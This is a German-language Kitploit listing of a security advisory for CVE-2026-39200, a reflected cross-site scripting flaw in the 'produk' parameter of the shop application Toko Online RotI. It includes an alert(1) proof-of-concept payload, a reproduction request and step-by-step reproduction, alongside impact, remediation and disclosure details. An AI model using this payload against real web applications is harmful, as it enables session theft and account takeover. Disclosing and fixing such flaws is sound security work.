Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-39200 — Der Wert des Produkt-Anfrageparameters wird in den Wert eines HTML-Tag-Attributs kopiert, das in doppelte Anführungszeichen eingekapselt ist. Der Payload xbnw0"><script>alert(1)</script>skc2h wurde im Produkt-Parameter übermittelt. Diese Eingabe wurde als xbnw0\"><script>alert(1)</script>skc2h in der Antwort der Anwendung zurückgegeben. | Kitploit
Tools/GitHubGitHub/r00tali/cve-2026-39200
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitPenetrationstestsPapers & ForschungLernen & Bildung
GitHubr00tali/cve-2026-39200

CVE-2026-39200

Repository anzeigen
13vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Der Wert des Produkt-Anfrageparameters wird in den Wert eines HTML-Tag-Attributs kopiert, das in doppelte Anführungszeichen eingekapselt ist. Der Payload xbnw0"><script>alert(1)</script>skc2h wurde im Produkt-Parameter übermittelt. Diese Eingabe wurde als xbnw0\"><script>alert(1)</script>skc2h in der Antwort der Anwendung zurückgegeben.

Teilen

CVE-2026-39200 — Reflektiertes Cross-Site-Scripting (XSS) in Toko Online RotI

Zusammenfassung

Eine reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke wurde im Anfrageparameter produk der Webanwendung Toko Online RotI identifiziert. Die Anwendung kodiert die benutzereingegebene Eingabe nicht HTML, bevor sie innerhalb eines HTML-Tag-Attributs zurückgespiegelt wird, das in doppelte Anführungszeichen eingeschlossen ist. Ein Angreifer kann eine bösartige URL erstellen, die beim Besuch durch ein Opfer beliebiges JavaScript im Kontext der Browsersitzung des Opfers ausführt.

FeldWert
CVE-IDCVE-2026-39200
Sicherheitslücken-TypCWE-79 — Improper Neutralization of Input During Web Page Generation (Reflected XSS)
Betroffenes ProduktToko Online RotI (Indonesian online store)
Betroffener Parameterproduk
EntdeckerUzair Ali (r00tali) — Penetration Tester / Bug Bounty Hunter
Entdeckungsdatum2026-07-03
CVE zugewiesen2026-07-12
Advisory veröffentlicht2026-07-19

Details zur Sicherheitslücke

Der Anfrageparameter produk wird wörtlich in den Wert eines HTML-Tag-Attributs übernommen, das in doppelte Anführungszeichen eingeschlossen ist. Da die Anwendung die benutzereingegebene Eingabe nicht HTML-kodiert, bevor sie zurückgespiegelt wird, kann ein Angreifer das Attribut durchbrechen, indem er eine Payload übermittelt, die ein schließendes doppeltes Anführungszeichen gefolgt von einer HTML/JavaScript-Payload enthält.

Proof-of-Concept-Payload

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

Wenn diese Payload als Parameter produk übermittelt wird, gibt die Anwendung die Eingabe unkodiert in die Antwort zurück. Das schließende "> beendet das ursprüngliche Attribut, und der injizierte <script>alert(1)</script>-Block wird vom Browser als neues HTML-Element interpretiert, wodurch beliebiges JavaScript in der Sitzung des Benutzers ausgeführt wird.

Verwundbares Muster (konzeptionell)

Die anfällige HTML-Antwort sieht wie folgt aus:

root@kitploit:~
<!-- VOR Injection -->
<input type="text" name="produk" value="BENUTZEREINGABE" />

<!-- NACH Injection mit Payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Browser führt dies aus

HTTP-Anfrage (Reproduktion)

root@kitploit:~
GET /[anfälliger-endpunkt]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [ziel-host]
User-Agent: Mozilla/5.0

HTTP-Antwort (Auszug)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

Reproduktionsschritte

  1. Identifizieren Sie einen Endpunkt in der Toko Online RotI-Anwendung, der den Parameter produk innerhalb eines HTML-Attributs zurückgibt (z. B. eine Produktsuche, Detail- oder Filterseite).
  2. Ersetzen Sie den Wert des Parameters produk durch die folgende Payload:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. Senden Sie die Anfrage an den Server.
  4. Überprüfen Sie die Antwort des Servers. Die Payload wird unverändert innerhalb des Attributs zurückgegeben, durchbricht das " und erzeugt ein gültiges <script>-Element im DOM.
  5. Laden Sie die erstellte Antwort in einem modernen Browser. Ein JavaScript-alert(1)-Dialog wird angezeigt, was die Ausführung beliebigen JavaScripts in der Sitzung des Opfers bestätigt.

Auswirkungen

Eine erfolgreiche Ausnutzung dieser reflektierten XSS ermöglicht einem Angreifer:

  • Sitzungscookies und Authentifizierungstoken stehlen, was zur Kontoübernahme führt.
  • Aktionen im Namen authentifizierter Benutzer ausführen, ohne deren Wissen.
  • Benutzer auf bösartige Websites umleiten (Phishing / Credential Harvesting).
  • Bösartige Inhalte in die Anwendung einschleusen (Defacement).
  • Tastatureingaben und Formulardaten des Opfers erfassen.
  • Browser-Sicherheitslücken für Drive-by-Malware ausnutzen.
  • Die Vertrauensbeziehung zwischen Benutzer und Anwendungsdomäne missbrauchen.

Da die Sicherheitslücke reflektiert ist, erfordert die Ausnutzung lediglich, dass ein Opfer auf einen erstellten Link klickt, was sie trivial für Phishing-Kampagnen bewaffnen lässt.

CVSS v3.1 (geschätzt): 6.1 (Medium) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Behebung

Um diese Sicherheitslücke zu beheben, sollte der Anbieter:

  1. Alle benutzereingegebenen Werte HTML-kodieren, bevor sie in der HTML-Ausgabe zurückgegeben werden. Kodieren Sie insbesondere <, >, ", ' und & (z. B. &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. Die integrierten Ausgabekodierungs-Helfer des Frameworks verwenden, anstatt manuelle Verkettung. Beispiele:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) oder <%: %>-Syntax
    • Python (Jinja2): {{ input }} (standardmäßig automatisches Escaping)
  3. Einen strengen Content-Security-Policy (CSP)-Antwortheader setzen, um die Auswirkungen verbleibender Injektionen zu begrenzen:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. Die Flags HttpOnly und Secure auf allen Sitzungscookies setzen, um zu verhindern, dass JavaScript diese lesen kann.
  5. Den Parameter produk gegen eine Positivliste erwarteter Produktidentifikatoren validieren (numerische IDs, Slugs usw.) und alles ablehnen, was nicht übereinstimmt.
  6. X-Content-Type-Options: nosniff hinzufügen, um MIME-Typ-Sniffing von Antworttexten zu verhindern.

Offenlegungszeitplan

DatumEreignis
2026-07-03Sicherheitslücke während autorisierter Sicherheitstests entdeckt
2026-07-03CVE-ID bei MITRE über cveform.mitre.org beantragt
2026-07-12CVE-2026-39200 vom MITRE-Zuweisungsteam zugewiesen
2026-07-19Öffentliches Advisory veröffentlicht

Entdecker

Uzair Ali (r00tali) — Penetration Tester / Bug Bounty Hunter / Security Researcher

  • GitHub: https://github.com/r00tali

Referenzen

  • OWASP — Cross-Site-Scripting (XSS)
  • CWE-79: Unzureichende Neutralisierung von Eingaben während der Seitengenerierung
  • PortSwigger — Reflektiertes XSS
  • MITRE CVE-Eintrag — CVE-2026-39200

Haftungsausschluss

Dieses Advisory wird nur zu Bildungs- und Verteidigungszwecken veröffentlicht. Die Sicherheitslücke wurde durch den verantwortungsvollen Offenlegungsprozess über das MITRE CVE Assignment Team gemeldet. Es werden keine vertraulichen Anbieterinformationen, Kundendaten oder proprietärer Code offengelegt. Der Proof-of-Concept verwendet eine harmlose alert(1)-Payload und soll das Vorhandensein des Fehlers demonstrieren, nicht Angriffe auf den aktiven Dienst erleichtern.

Tool herunterladen